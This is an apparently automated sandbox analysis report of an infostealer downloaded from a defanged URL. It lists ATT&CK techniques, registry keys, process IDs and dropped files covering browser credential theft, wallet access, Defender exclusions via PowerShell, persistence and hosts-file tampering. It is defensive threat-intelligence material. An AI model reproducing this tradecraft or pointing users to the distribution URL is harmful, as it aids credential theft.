hxxps://new[.]mined[.]to/resources/3/download

Analysis

max time kernel
150s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
02/08/2024, 19:25

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

https://new.mined.to/resources/3/download

Score

9^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer trojan upx

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Boot or Logon Autostart Execution: Active Setup 2 TTPs 14 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\ = "Google Chrome"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\StubPath = "\"C:\\Program Files\\Google\\Chrome\\Application\\127.0.6533.89\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level --channel=stable"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Localized Name = "Google Chrome"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\StubPath = "\"C:\\Program Files\\Google\\Chrome\\Application\\127.0.6533.89\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level --channel=stable"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Version = "43,0,0,0"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\ = "Google Chrome"	setup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\IsInstalled = "1"	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Version = "43,0,0,0"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components	setup.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\IsInstalled = "1"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{8A69D345-D564-463c-AFF1-A69D9E530F96}\Localized Name = "Google Chrome"	setup.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3004	powershell.exe
4376	powershell.exe
4704	powershell.exe
4628	powershell.exe
5416	powershell.exe
1616	powershell.exe
4624	powershell.exe
5540	powershell.exe
6096	powershell.exe
4112	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Resource.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Resource.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 4 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
468	cmd.exe
5380	powershell.exe
5300	cmd.exe
4576	powershell.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 40 IoCs

pid	Process
4604	Resource.exe
2944	Resource.exe
4672	bound.exe
560	updater.exe
4804	updater.exe
2244	updater.exe
4772	updater.exe
340	updater.exe
2776	updater.exe
4592	rar.exe
5556	127.0.6533.89_chrome_installer.exe
5312	setup.exe
5780	setup.exe
5832	setup.exe
5492	setup.exe
3180	chrome.exe
3140	chrome.exe
3388	chrome.exe
4636	chrome.exe
1048	chrome.exe
2224	elevation_service.exe
2704	chrome.exe
5512	chrome.exe
924	chrome.exe
4944	chrome.exe
1876	chrome.exe
3952	Resource.exe
5532	Resource.exe
900	bound.exe
6108	updater.exe
4588	updater.exe
5216	updater.exe
5768	updater.exe
5616	rar.exe
2308	127.0.6533.89_chrome_installer.exe
2268	setup.exe
1396	setup.exe
4660	setup.exe
1680	setup.exe
3984	elevation_service.exe

Loads dropped DLL 64 IoCs

pid	Process
2944	Resource.exe
2944	Resource.exe
2944	Resource.exe
2944	Resource.exe
2944	Resource.exe
2944	Resource.exe
2944	Resource.exe
2944	Resource.exe
2944	Resource.exe
2944	Resource.exe
2944	Resource.exe
2944	Resource.exe
2944	Resource.exe
2944	Resource.exe
2944	Resource.exe
2944	Resource.exe
3180	chrome.exe
3140	chrome.exe
3180	chrome.exe
3388	chrome.exe
4636	chrome.exe
3388	chrome.exe
4636	chrome.exe
1048	chrome.exe
4636	chrome.exe
4636	chrome.exe
4636	chrome.exe
1048	chrome.exe
4636	chrome.exe
4636	chrome.exe
4636	chrome.exe
2704	chrome.exe
5512	chrome.exe
5512	chrome.exe
2704	chrome.exe
924	chrome.exe
924	chrome.exe
4944	chrome.exe
4944	chrome.exe
1876	chrome.exe
1876	chrome.exe
5532	Resource.exe
5532	Resource.exe
5532	Resource.exe
5532	Resource.exe
5532	Resource.exe
5532	Resource.exe
5532	Resource.exe
5532	Resource.exe
5532	Resource.exe
5532	Resource.exe
5532	Resource.exe
5532	Resource.exe
5532	Resource.exe
5532	Resource.exe
5532	Resource.exe
5532	Resource.exe
5308	chrome.exe
6012	chrome.exe
5308	chrome.exe
1316	chrome.exe
5880	chrome.exe
1316	chrome.exe
5880	chrome.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000100000002ab24-135.dat	upx
behavioral2/memory/2944-139-0x00007FFD585F0000-0x00007FFD58BD8000-memory.dmp	upx
behavioral2/files/0x000100000002ab16-141.dat	upx
behavioral2/files/0x000100000002ab22-143.dat	upx
behavioral2/files/0x000100000002ab1d-161.dat	upx
behavioral2/memory/2944-163-0x00007FFD6FF80000-0x00007FFD6FF8F000-memory.dmp	upx
behavioral2/memory/2944-162-0x00007FFD6BFF0000-0x00007FFD6C014000-memory.dmp	upx
behavioral2/files/0x000100000002ab1c-160.dat	upx
behavioral2/files/0x000100000002ab1b-159.dat	upx
behavioral2/files/0x000100000002ab1a-158.dat	upx
behavioral2/files/0x000100000002ab19-157.dat	upx
behavioral2/files/0x000100000002ab18-156.dat	upx
behavioral2/files/0x000100000002ab17-155.dat	upx
behavioral2/files/0x000100000002ab15-154.dat	upx
behavioral2/files/0x000100000002ab29-153.dat	upx
behavioral2/files/0x000100000002ab28-152.dat	upx
behavioral2/files/0x000100000002ab27-151.dat	upx
behavioral2/files/0x000100000002ab23-148.dat	upx
behavioral2/files/0x000100000002ab21-147.dat	upx
behavioral2/memory/2944-169-0x00007FFD6BEB0000-0x00007FFD6BEDD000-memory.dmp	upx
behavioral2/memory/2944-172-0x00007FFD6BC70000-0x00007FFD6BC89000-memory.dmp	upx
behavioral2/memory/2944-173-0x00007FFD6BA00000-0x00007FFD6BA23000-memory.dmp	upx
behavioral2/memory/2944-175-0x00007FFD58470000-0x00007FFD585E3000-memory.dmp	upx
behavioral2/memory/2944-179-0x00007FFD6EE50000-0x00007FFD6EE5D000-memory.dmp	upx
behavioral2/memory/2944-178-0x00007FFD6B3A0000-0x00007FFD6B3B9000-memory.dmp	upx
behavioral2/memory/2944-185-0x00007FFD58030000-0x00007FFD583A5000-memory.dmp	upx
behavioral2/memory/2944-184-0x00007FFD583B0000-0x00007FFD58468000-memory.dmp	upx
behavioral2/memory/2944-183-0x00007FFD6B370000-0x00007FFD6B39E000-memory.dmp	upx
behavioral2/memory/2944-187-0x00007FFD6B120000-0x00007FFD6B134000-memory.dmp	upx
behavioral2/memory/2944-189-0x00007FFD585F0000-0x00007FFD58BD8000-memory.dmp	upx
behavioral2/memory/2944-190-0x00007FFD6BC60000-0x00007FFD6BC6D000-memory.dmp	upx
behavioral2/memory/2944-193-0x00007FFD57F10000-0x00007FFD5802C000-memory.dmp	upx
behavioral2/memory/2944-326-0x00007FFD6BFF0000-0x00007FFD6C014000-memory.dmp	upx
behavioral2/memory/2944-409-0x00007FFD58470000-0x00007FFD585E3000-memory.dmp	upx
behavioral2/memory/2944-414-0x00007FFD58030000-0x00007FFD583A5000-memory.dmp	upx
behavioral2/memory/2944-418-0x00007FFD6BA00000-0x00007FFD6BA23000-memory.dmp	upx
behavioral2/memory/2944-413-0x00007FFD583B0000-0x00007FFD58468000-memory.dmp	upx
behavioral2/memory/2944-412-0x00007FFD6B370000-0x00007FFD6B39E000-memory.dmp	upx
behavioral2/memory/2944-410-0x00007FFD6B3A0000-0x00007FFD6B3B9000-memory.dmp	upx
behavioral2/memory/2944-403-0x00007FFD585F0000-0x00007FFD58BD8000-memory.dmp	upx
behavioral2/memory/2944-404-0x00007FFD6BFF0000-0x00007FFD6C014000-memory.dmp	upx
behavioral2/memory/2944-429-0x00007FFD583B0000-0x00007FFD58468000-memory.dmp	upx
behavioral2/memory/2944-441-0x00007FFD6B3A0000-0x00007FFD6B3B9000-memory.dmp	upx
behavioral2/memory/2944-442-0x00007FFD6B370000-0x00007FFD6B39E000-memory.dmp	upx
behavioral2/memory/2944-440-0x00007FFD58470000-0x00007FFD585E3000-memory.dmp	upx
behavioral2/memory/2944-439-0x00007FFD6BA00000-0x00007FFD6BA23000-memory.dmp	upx
behavioral2/memory/2944-438-0x00007FFD6BC70000-0x00007FFD6BC89000-memory.dmp	upx
behavioral2/memory/2944-437-0x00007FFD6BEB0000-0x00007FFD6BEDD000-memory.dmp	upx
behavioral2/memory/2944-436-0x00007FFD6FF80000-0x00007FFD6FF8F000-memory.dmp	upx
behavioral2/memory/2944-435-0x00007FFD6BFF0000-0x00007FFD6C014000-memory.dmp	upx
behavioral2/memory/2944-434-0x00007FFD6EE50000-0x00007FFD6EE5D000-memory.dmp	upx
behavioral2/memory/2944-433-0x00007FFD57F10000-0x00007FFD5802C000-memory.dmp	upx
behavioral2/memory/2944-432-0x00007FFD6BC60000-0x00007FFD6BC6D000-memory.dmp	upx
behavioral2/memory/2944-431-0x00007FFD6B120000-0x00007FFD6B134000-memory.dmp	upx
behavioral2/memory/2944-430-0x00007FFD58030000-0x00007FFD583A5000-memory.dmp	upx
behavioral2/memory/2944-419-0x00007FFD585F0000-0x00007FFD58BD8000-memory.dmp	upx
behavioral2/memory/5532-617-0x00007FFD56680000-0x00007FFD56C68000-memory.dmp	upx
behavioral2/memory/5532-619-0x00007FFD75500000-0x00007FFD7550F000-memory.dmp	upx
behavioral2/memory/5532-618-0x00007FFD6BEB0000-0x00007FFD6BED4000-memory.dmp	upx
behavioral2/memory/5532-624-0x00007FFD6BC60000-0x00007FFD6BC8D000-memory.dmp	upx
behavioral2/memory/5532-625-0x00007FFD6BA10000-0x00007FFD6BA29000-memory.dmp	upx
behavioral2/memory/5532-626-0x00007FFD6AFA0000-0x00007FFD6AFC3000-memory.dmp	upx
behavioral2/memory/5532-627-0x00007FFD56360000-0x00007FFD564D3000-memory.dmp	upx
behavioral2/memory/5532-628-0x00007FFD6AD60000-0x00007FFD6AD79000-memory.dmp	upx

Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	updater.exe

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
49	ip-api.com
20	ip-api.com
23	ip-api.com
43	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Checks system information in the registry 2 TTPs 2 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	chrome.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk	setup.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk	setup.exe

Enumerates processes with tasklist 1 TTPs 10 IoCs

discovery

Process Discovery

T1057

pid	Process
5520	tasklist.exe
3344	tasklist.exe
4048	tasklist.exe
3880	tasklist.exe
2736	tasklist.exe
1512	tasklist.exe
5756	tasklist.exe
1316	tasklist.exe
1144	tasklist.exe
5568	tasklist.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\fa.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\hu.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\ru.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\VisualElements\LogoBeta.png	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\WidevineCdm\LICENSE	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\optimization_guide_internal.dll	setup.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad\metadata	updater.exe
File created	C:\Program Files (x86)\Google\GoogleUpdater\prefs.json~RFe582536.TMP	updater.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\72a1bfa9-7a5d-464d-b76b-55ca34700cc9.tmp	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\chrome.7z	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\VisualElements\LogoDev.png	setup.exe
File created	C:\Program Files\Google\Chrome\Application\127.0.6533.89\Installer\chrmstp.exe	setup.exe
File created	C:\Program Files (x86)\Google\GoogleUpdater\prefs.json~RFe58dc42.TMP	updater.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\updater.log	updater.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\updater.log	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\et.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\sw.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\ta.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\WidevineCdm\_platform_specific\win_x64\widevinecdm.dll.sig	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\libEGL.dll	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\mr.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\resources.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\updater.log	updater.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad\metadata	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\VisualElements\SmallLogo.png	setup.exe
File created	C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\uninstall.cmd	updater.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\updater.log	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\chrome_100_percent.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\en-US.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\ko.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\nl.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\pt-BR.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\eventlog_provider.dll	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\libGLESv2.dll	setup.exe
File created	C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\updater.exe	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\chrome_200_percent.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\bn.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\sl.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad\metadata	updater.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\92cef9bf-6a48-4ffd-bf3c-a7340394b110.tmp	updater.exe
File created	C:\Program Files (x86)\Google\GoogleUpdater\72a1bfa9-7a5d-464d-b76b-55ca34700cc9.tmp	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\it.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\tr.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\zh-CN.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\updater.log.old	bound.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad\settings.dat	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\gu.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\kn.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\chrome_wer.dll	setup.exe
File created	C:\Program Files (x86)\Google\GoogleUpdater\prefs.json~RFe595f2d.TMP	updater.exe
File created	C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\901743dd-76ce-4235-829f-4c81caf156bd.tmp	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\en-GB.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\hi.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\vi.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\WidevineCdm\manifest.json	setup.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad\metadata	updater.exe
File created	C:\Program Files (x86)\Google\GoogleUpdater\f7a58eb1-4c93-498c-a783-7599bb197b92.tmp	updater.exe
File opened for modification	C:\Program Files (x86)\Google\Update\GoogleUpdate.exe	updater.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\es.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\sr.pak	setup.exe
File created	C:\Program Files\Google\Chrome\Temp\source5312_829978055\Chrome-bin\127.0.6533.89\Locales\te.pak	setup.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\updater.log	bound.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\updater.log.old	updater.exe
File opened for modification	C:\Program Files (x86)\Google\GoogleUpdater\128.0.6597.0\Crashpad\metadata	updater.exe

Drops file in Windows directory 45 IoCs

description	ioc	Process
File created	C:\Windows\SystemTemp\chrome_url_fetcher_340_1184983419\-8a69d345-d564-463c-aff1-a69d9e530f96-_127.0.6533.89_all_adycmr6jx3qtuvzwqnt6zqbjugoq.crx3	updater.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping340_909927773\127.0.6533.89_chrome_installer.exe	updater.exe
File created	C:\Windows\SystemTemp\chrome_url_fetcher_5216_1133981075\-8a69d345-d564-463c-aff1-a69d9e530f96-_127.0.6533.89_all_adycmr6jx3qtuvzwqnt6zqbjugoq.crx3	updater.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5216_180481985\manifest.fingerprint	updater.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\metadata	setup.exe
File opened for modification	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping340_909927773\CR_B5B28.tmp\setup.exe	127.0.6533.89_chrome_installer.exe
File created	C:\Windows\SystemTemp\Google900_1306804875\updater.7z	bound.exe
File created	C:\Windows\SystemTemp\Google900_1306804875\bin\updater.exe	bound.exe
File opened for modification	C:\Windows\SystemTemp	setup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\settings.dat	setup.exe
File opened for modification	C:\Windows\SystemTemp	bound.exe
File created	C:\Windows\SystemTemp\Google4672_2138514451\updater.7z	bound.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping340_909927773\manifest.json	updater.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping340_909927773\CR_B5B28.tmp\setup.exe	127.0.6533.89_chrome_installer.exe
File opened for modification	C:\Windows\SystemTemp	setup.exe
File opened for modification	C:\Windows\SystemTemp	updater.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\settings.dat	setup.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5216_180481985\2a533291-14c9-4980-b2ea-ce699c7b30d5.tmp	updater.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5216_180481985\CR_7D969.tmp\CHROME.PACKED.7Z	127.0.6533.89_chrome_installer.exe
File created	C:\Windows\SystemTemp\Google4672_2138514451\bin\uninstall.cmd	bound.exe
File created	C:\Windows\SystemTemp\Google4672_2138514451\bin\updater.exe	bound.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping340_909927773\manifest.fingerprint	updater.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping340_909927773\b0331570-6a14-40bf-ab70-c8f0a217694c.tmp	updater.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping340_909927773\CR_B5B28.tmp\SETUP.EX_	127.0.6533.89_chrome_installer.exe
File opened for modification	C:\Windows\SystemTemp	updater.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\settings.dat	setup.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5216_180481985\_metadata\verified_contents.json	updater.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5216_180481985\CR_7D969.tmp\SETUP.EX_	127.0.6533.89_chrome_installer.exe
File created	C:\Windows\SystemTemp\Google4672_603999083\UPDATER.PACKED.7Z	bound.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File created	C:\Windows\SystemTemp\Google900_1306804875\bin\uninstall.cmd	bound.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5216_180481985\127.0.6533.89_chrome_installer.exe	updater.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\metadata	setup.exe
File opened for modification	C:\Windows\SystemTemp	bound.exe
File created	C:\Windows\SystemTemp\Google900_2761262\UPDATER.PACKED.7Z	bound.exe
File opened for modification	C:\Windows\SystemTemp	updater.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping340_909927773\_metadata\verified_contents.json	updater.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping340_909927773\CR_B5B28.tmp\CHROME.PACKED.7Z	127.0.6533.89_chrome_installer.exe
File opened for modification	C:\Windows\SystemTemp	setup.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\metadata	setup.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5216_180481985\manifest.json	updater.exe
File created	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5216_180481985\CR_7D969.tmp\setup.exe	127.0.6533.89_chrome_installer.exe
File opened for modification	C:\Windows\SystemTemp\Crashpad\metadata	setup.exe
File opened for modification	C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping5216_180481985\CR_7D969.tmp\setup.exe	127.0.6533.89_chrome_installer.exe
File opened for modification	C:\Windows\SystemTemp	chrome.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Resource.exe:Zone.Identifier	msedge.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bound.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	updater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bound.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	updater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	updater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	updater.exe
